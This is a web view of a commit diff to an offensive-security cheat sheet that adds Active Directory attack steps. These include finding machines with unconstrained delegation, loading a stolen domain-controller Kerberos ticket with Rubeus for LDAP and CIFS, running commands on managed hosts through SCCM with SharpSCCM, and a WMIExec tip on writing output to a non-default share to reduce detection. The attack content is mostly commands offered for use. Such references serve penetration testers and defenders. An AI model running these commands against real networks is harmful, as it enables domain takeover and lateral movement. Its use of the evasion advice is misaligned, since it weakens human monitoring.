Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00
Code Issues Projects Releases Packages Wiki Activity

WMIExec + SharpSCCM

Browse source
This commit is contained in:
Swissky 2023-02-15 12:33:20 +01:00
parent 36e135776f
commit ae46ac0338
2 changed files with 22 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
Methodology and Resources/Active Directory Attack.md
View file

@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
:warning: Unconstrained delegation used to be the only option available in Windows 2000 :warning: Unconstrained delegation used to be the only option available in Windows 2000
> **Warning**
> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
#### SpoolService Abuse with Unconstrained Delegation #### SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer
##### Find delegation ##### Find delegation
:warning: : Domain controllers usually have unconstrained delegation enabled. :warning: : Domain controllers usually have unconstrained delegation enabled.
Check the `TrustedForDelegation` property. Check the `TRUSTED_FOR_DELEGATION` property.
* [ADModule](https://github.com/samratashok/ADModule) * [ADModule](https://github.com/samratashok/ADModule)
```powershell ```powershell
@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property.
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
``` ```
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
##### SpoolService status ##### SpoolService status
Check if the spool service is running on the remote host Check if the spool service is running on the remote host
@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller.
Extract the base64 TGT from Rubeus output and load it to our current session. Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell ```powershell
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt .\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
``` ```
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) * [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) * [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
```
* Compromise client, use locate to find management server * Compromise client, use locate to find management server
```ps1 ```ps1
MalSCCM.exe locate MalSCCM.exe locate
@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString "" ConvertFrom-SddlString ""
``` ```
### SCCM Shares ### SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

6
Methodology and Resources/Windows - Using credentials.md
View file

@ -10,6 +10,7 @@
* [Crackmapexec](#crackmapexec) * [Crackmapexec](#crackmapexec)
* [Impacket](#impacket) * [Impacket](#impacket)
* [PSExec](#psexec) * [PSExec](#psexec)
* [WMIExec](#wmiexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu
You need to update the pipe name to match "Custom_communication" in the line 163 You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
### WMIExec
Use a non default share `-share SHARE` to write the output to reduce the detection.
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
## RDP Remote Desktop Protocol ## RDP Remote Desktop Protocol